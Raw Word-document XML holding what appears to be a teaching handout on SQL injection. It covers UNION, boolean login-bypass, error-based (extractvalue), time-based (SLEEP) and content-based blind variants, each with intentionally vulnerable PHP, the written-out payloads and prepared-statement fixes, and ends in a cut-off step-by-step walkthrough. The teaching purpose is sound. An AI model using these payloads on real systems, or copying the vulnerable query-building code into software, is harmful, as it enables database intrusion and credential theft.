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3C34" w14:textId="0D0C349E" w:rsid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Examples</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D2E3EE" w14:textId="5F4476E6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8128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UNION-Based SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C7EDCCD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0A7F89">
          <v:rect id="_x0000_i1025" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E99F47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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72905BE7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attacker wants to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extract database information (like database name, version, or admin credentials)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a vulnerable search field.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2722A973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Vulnerable Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77CB766B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$conn = new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mysqli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("localhost", "root", "", "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testdb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$id = $_GET['id'];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$query = "SELECT username, role FROM users WHERE id = $id";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$result = $conn-&gt;query($query);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while($row = $result-&gt;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fetch_assoc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{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echo "User: " . $row['username'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.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 - Role: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.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$row['role'];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?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="538AD850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CBAB0B">
          <v:rect id="_x0000_i1026" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="10994F34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Happens Internally?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64804512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user enters:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E6B2CF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?id=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58667EEC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becomes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2007C3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username, role FROM users WHERE id =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</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="3AD6B07D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Normal </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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3D6D92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6DC3FF">
          <v:rect id="_x0000_i1027" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A162CA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💣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Attack Payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E57B6AC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?id=1 UNION SELECT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607D5C6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Modified Query</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A0FF58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SELECT username, role FROM users WHERE id = 1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UNION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SELECT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version();</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1C70BAD2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050944">
          <v:rect id="_x0000_i1028" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BBBDAB0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Result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C167F4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user data, attacker sees:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76BDE98F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testdb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- 8.0.33</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB5FEB2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name and MySQL version leaked.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F8D44B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416AAB">
          <v:rect id="_x0000_i1029" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F5352A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⚠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It Works</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34053FA9" w14:textId="77777777" w:rsidR="00812865" w:rsidRPr="00812865" w:rsidRDefault="00812865" w:rsidP="00812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UNION merges two SELECT results.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48680119" w14:textId="77777777" w:rsidR="00812865" w:rsidRPr="00812865" w:rsidRDefault="00812865" w:rsidP="00812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 must match:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58FEF997" w14:textId="77777777" w:rsidR="00812865" w:rsidRPr="00812865" w:rsidRDefault="00812865" w:rsidP="008128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number of columns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48BA0A12" w14:textId="77777777" w:rsidR="00812865" w:rsidRPr="00812865" w:rsidRDefault="00812865" w:rsidP="008128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Compatible data types</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242123D1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A5EA5A">
          <v:rect id="_x0000_i1030" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2667C326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🔒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Secure Version (Prepared Statement)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B64173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$conn-&gt;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prepare(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"SELECT username, role FROM users WHERE id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bind_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$id);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execute();</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6BF9BEE7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C5C6F">
          <v:rect id="_x0000_i1031" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="671D93EF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8128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Boolean-Based SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C126F1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12CAB8">
          <v:rect id="_x0000_i1032" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="30FFD3B4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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61696672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page verifies credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="238C1D40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F7B7C0">
          <v:rect id="_x0000_i1033" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="514AE110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Vulnerable Login Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A90139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$conn = new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mysqli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("localhost", "root", "", "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testdb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$username = $_POST['username'];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$password = $_POST['password'];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$query = "SELECT * FROM users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WHERE username='$username'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AND password='$password'";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$result = $conn-&gt;query($query);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if($result-&gt;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num_rows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0){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echo "Login Successful";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 else {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echo "Invalid credentials";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?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA0BC74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5148D1">
          <v:rect id="_x0000_i1034" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="676A7253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Normal Login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B0BF3A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Input:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA5158D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 admin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password: admin123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="343870E7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Query:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74502DF9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users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WHERE username='admin'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AND password='admin123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4300A46A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6374BB">
          <v:rect id="_x0000_i1035" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB05333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💣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Boolean Attack Payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29747317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 admin' OR 1=1 --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password: anything</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73700F98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becomes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D133D0C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users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WHERE username='admin' OR 1=1 -- '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AND password='anything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5619AE87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821EF8">
          <v:rect id="_x0000_i1036" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="32496196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Explanation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44318A96" w14:textId="77777777" w:rsidR="00812865" w:rsidRPr="00812865" w:rsidRDefault="00812865" w:rsidP="00812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 1=1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always TRUE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B9E8731" w14:textId="77777777" w:rsidR="00812865" w:rsidRPr="00812865" w:rsidRDefault="00812865" w:rsidP="00812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comments out rest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB52F74" w14:textId="77777777" w:rsidR="00812865" w:rsidRPr="00812865" w:rsidRDefault="00812865" w:rsidP="00812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condition always true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00EA4804" w14:textId="77777777" w:rsidR="00812865" w:rsidRPr="00812865" w:rsidRDefault="00812865" w:rsidP="00812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row returned → Login bypass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D970E2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EB05CE">
          <v:rect id="_x0000_i1037" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ECC671E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Result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="129CC71D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Attacker logs in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knowing password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="238F5584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4A9764">
          <v:rect id="_x0000_i1038" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD06259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🔒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Secure Version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7159CF6A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$conn-&gt;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prepare(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"SELECT * FROM users WHERE username=? AND password=?");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bind_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"ss", $username, $password);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execute();</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1D77029B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9E8C02">
          <v:rect id="_x0000_i1039" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="79ABB9C4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8128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Error-Based SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C027CA7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6DD072">
          <v:rect id="_x0000_i1040" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1674F49A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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD87AEF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shows database errors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF0E523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E253DD">
          <v:rect id="_x0000_i1041" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A93400B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Vulnerable Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E0C8EAE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$id = $_GET['id'];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$query = "SELECT * FROM users WHERE id = $id";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$result = $conn-&gt;query($query) or die(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mysqli_error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($conn)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2CA9B40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B82F2E">
          <v:rect id="_x0000_i1042" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B2D19F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💣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Attack Payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0420A5C5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?id=1 AND </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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extractvalue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1, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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concat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0x7e,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 0x7e))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73842458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F6BCB8">
          <v:rect id="_x0000_i1043" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F734380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Modified Query</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F13EF8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users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WHERE id = 1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AND </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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extractvalue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1, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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concat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0x7e,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 0x7e)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9099626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B2C3D8">
          <v:rect id="_x0000_i1044" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD1F291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Result (Error Message)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44537872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XPATH syntax error: ~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testdb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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51408A1A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name leaked via error.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33FED55F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0102FFB">
          <v:rect id="_x0000_i1045" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="524C73C1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Principle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A018F93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 uses:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08EDD9CA" w14:textId="77777777" w:rsidR="00812865" w:rsidRPr="00812865" w:rsidRDefault="00812865" w:rsidP="00812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extractvalue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7C8D6A1" w14:textId="77777777" w:rsidR="00812865" w:rsidRPr="00812865" w:rsidRDefault="00812865" w:rsidP="00812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updatexml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EDE9376" w14:textId="77777777" w:rsidR="00812865" w:rsidRPr="00812865" w:rsidRDefault="00812865" w:rsidP="00812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malformed functions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BCBFFD1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force database to display hidden data inside error.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C21C89E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0D6310">
          <v:rect id="_x0000_i1046" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="371A517B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🔒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Secure Fix</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B4ADBC" w14:textId="77777777" w:rsidR="00812865" w:rsidRPr="00812865" w:rsidRDefault="00812865" w:rsidP="00812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 error display</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3979B4CD" w14:textId="77777777" w:rsidR="00812865" w:rsidRPr="00812865" w:rsidRDefault="00812865" w:rsidP="00812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exception handling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D19FC76" w14:textId="77777777" w:rsidR="00812865" w:rsidRPr="00812865" w:rsidRDefault="00812865" w:rsidP="00812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prepared statements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F6E221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9E1D1A">
          <v:rect id="_x0000_i1047" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="724DECB8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8128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Time-Based Blind SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="327F3BCA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CF4270">
          <v:rect id="_x0000_i1048" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5625926B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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6EEB22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does NOT show errors or output differences.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C3F7682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 must infer data using time delay.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B21624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34B448">
          <v:rect id="_x0000_i1049" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="400856C5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Vulnerable Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF5886E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$id = $_GET['id'];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$query = "SELECT * FROM users WHERE id = $id";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$result = $conn-&gt;query($query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87F94AA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output difference visible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31771A25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F4EFB8">
          <v:rect id="_x0000_i1050" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4132D5DB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💣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Attack Payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56431949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?id=1 AND IF(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),1,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1)=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't',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5), 0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="672DE07B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9D3D36">
          <v:rect id="_x0000_i1051" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6609BC27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Query</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E840C78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users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WHERE id = 1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AND IF(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),1,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1)=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't',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5), 0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ADF2B70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421284">
          <v:rect id="_x0000_i1052" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E924B57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Happens?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D6138C5" w14:textId="77777777" w:rsidR="00812865" w:rsidRPr="00812865" w:rsidRDefault="00812865" w:rsidP="00812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DB name starts with "t"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15CBDAA0" w14:textId="77777777" w:rsidR="00812865" w:rsidRPr="00812865" w:rsidRDefault="00812865" w:rsidP="00812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waits 5 seconds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="488EE5BF" w14:textId="77777777" w:rsidR="00812865" w:rsidRPr="00812865" w:rsidRDefault="00812865" w:rsidP="00812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 measures delay</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D109E04" w14:textId="77777777" w:rsidR="00812865" w:rsidRPr="00812865" w:rsidRDefault="00812865" w:rsidP="00812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Extracts DB name character by character</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718AB9D2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CD19E2">
          <v:rect id="_x0000_i1053" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="72079A3B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Result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B4CDD5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 reconstructs full DB name via timing analysis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B493CB8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66DB54">
          <v:rect id="_x0000_i1054" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="03AB3E9B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8128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Blind (Content-Based) SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8D7907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F8F265">
          <v:rect id="_x0000_i1055" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D68EEA3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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D97CF0A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returns:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63EE74B8" w14:textId="77777777" w:rsidR="00812865" w:rsidRPr="00812865" w:rsidRDefault="00812865" w:rsidP="00812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"User exists"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E0098A0" w14:textId="77777777" w:rsidR="00812865" w:rsidRPr="00812865" w:rsidRDefault="00812865" w:rsidP="00812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"User not found"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07EC0D8B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77CE1B">
          <v:rect id="_x0000_i1056" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D031B1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Vulnerable Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F0EFC84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$username = $_GET['username'];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$query = "SELECT * FROM users WHERE username='$username'";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$result = $conn-&gt;query($query);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if($result-&gt;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num_rows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0){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echo "User exists";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 else {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echo "User not found";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1CFA03AF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2AAB3D">
          <v:rect id="_x0000_i1057" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6C1F19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💣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Attack Payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F1E9B5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?username=admin' AND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),1,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1)=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't' --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F9FA69C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F81D4C">
          <v:rect id="_x0000_i1058" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC7910E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Query</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25148C85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users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WHERE username='admin'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AND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),1,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1)=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't' --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205F9A44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88DA27">
          <v:rect id="_x0000_i1059" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EADF547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42A75EB6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TRUE → "User exists"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 FALSE → "User not found"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E9559E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 reconstructs database name using TRUE/FALSE logic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77865EA5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25F996">
          <v:rect id="_x0000_i1060" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E9CE62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🔬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Execution Engine Perspective (Advanced View)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C9F7BEA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 Injection works because:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D6192A7" w14:textId="77777777" w:rsidR="00812865" w:rsidRPr="00812865" w:rsidRDefault="00812865" w:rsidP="00812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input is concatenated before parsing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3343F7EC" w14:textId="77777777" w:rsidR="00812865" w:rsidRPr="00812865" w:rsidRDefault="00812865" w:rsidP="00812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parser sees injected payload as part of SQL grammar.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="518AD7C0" w14:textId="77777777" w:rsidR="00812865" w:rsidRPr="00812865" w:rsidRDefault="00812865" w:rsidP="00812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plan is created including malicious clause.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5683B15F" w14:textId="77777777" w:rsidR="00812865" w:rsidRPr="00812865" w:rsidRDefault="00812865" w:rsidP="00812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 engine executes attacker logic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15387470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E4CD3B">
          <v:rect id="_x0000_i1061" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D7A7E2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Attack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694"/>
        <w:gridCol w:w="1774"/>
        <w:gridCol w:w="1601"/>
      </w:tblGrid>
      <w:tr w:rsidR="00812865" w:rsidRPr="00812865" w14:paraId="034AF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04F9C" w14:textId="77777777" w:rsidR="00812865" w:rsidRPr="00812865" w:rsidRDefault="00812865" w:rsidP="0081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0AEA96" w14:textId="77777777" w:rsidR="00812865" w:rsidRPr="00812865" w:rsidRDefault="00812865" w:rsidP="0081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Output Visible?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="12D6714F" w14:textId="77777777" w:rsidR="00812865" w:rsidRPr="00812865" w:rsidRDefault="00812865" w:rsidP="0081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7C59DFE" w14:textId="77777777" w:rsidR="00812865" w:rsidRPr="00812865" w:rsidRDefault="00812865" w:rsidP="0081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Goal</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00812865" w:rsidRPr="00812865" w14:paraId="1E288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1C41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7D5BD9EE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C47B04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UNION SELECT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="57B03686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Dump data</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00812865" w:rsidRPr="00812865" w14:paraId="3CBCF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873E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9B615CF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6FA090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 1=1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1A6F592E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bypass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00812865" w:rsidRPr="00812865" w14:paraId="682BE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83CC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3CCFB01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C643A8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extractvalue</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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1E6C41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Leak via error</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00812865" w:rsidRPr="00812865" w14:paraId="097A8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4EF8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Blind</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0A246FE4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E5319B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1DACCE7E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inference</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00812865" w:rsidRPr="00812865" w14:paraId="1232F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62EF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F8B4EDB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5CEDD7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SLEEP(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/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1D397C" w14:textId="77777777" w:rsidR="00812865" w:rsidRPr="00812865" w:rsidRDefault="00812865" w:rsidP="00812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28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Delay inference</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="495A2DAC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A20CD3">
          <v:rect id="_x0000_i1062" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2396E9AA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🎓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Academic Insight</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F8EF1DA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SQLi types fundamentally exploit:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E122E4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Improper separation between code and data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D0477D8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correct architectural </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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is:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F766C57" w14:textId="77777777" w:rsidR="00812865" w:rsidRPr="00812865" w:rsidRDefault="00812865" w:rsidP="008128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Prepared statements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D271B67" w14:textId="77777777" w:rsidR="00812865" w:rsidRPr="00812865" w:rsidRDefault="00812865" w:rsidP="008128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ORM frameworks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0052F113" w14:textId="77777777" w:rsidR="00812865" w:rsidRPr="00812865" w:rsidRDefault="00812865" w:rsidP="008128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Least privilege DB accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F7114A" w14:textId="77777777" w:rsidR="00812865" w:rsidRPr="00812865" w:rsidRDefault="00812865" w:rsidP="00812865">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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WAF (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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-in-depth)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA12E8F" w14:textId="77777777" w:rsidR="00812865" w:rsidRDefault="00812865"/>
    <w:p w14:paraId="5991491F" w14:textId="04839E96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8128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Time-Based Blind SQL Injection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Detailed Step by Step </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4812FCBC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81286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Time-Based Blind SQL Injection — Step-by-Step (Deep + Practical)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B76997B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assume a vulnerable endpoint like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FEACDB7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http://target/app.php?id=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE2AAA3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the backend builds SQL like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB92227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users WHERE id = &lt;USER_INPUT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&gt;;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6860246E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Time-based blind SQLi is used when:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B62903D" w14:textId="77777777" w:rsidR="00812865" w:rsidRPr="00812865" w:rsidRDefault="00812865" w:rsidP="008128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SQL errors are shown</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F444CCD" w14:textId="77777777" w:rsidR="00812865" w:rsidRPr="00812865" w:rsidRDefault="00812865" w:rsidP="008128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data is reflected</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4329BE" w14:textId="77777777" w:rsidR="00812865" w:rsidRPr="00812865" w:rsidRDefault="00812865" w:rsidP="008128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Responses look “same”, so attacker uses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response time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the signal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA52CA0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3C5CE0">
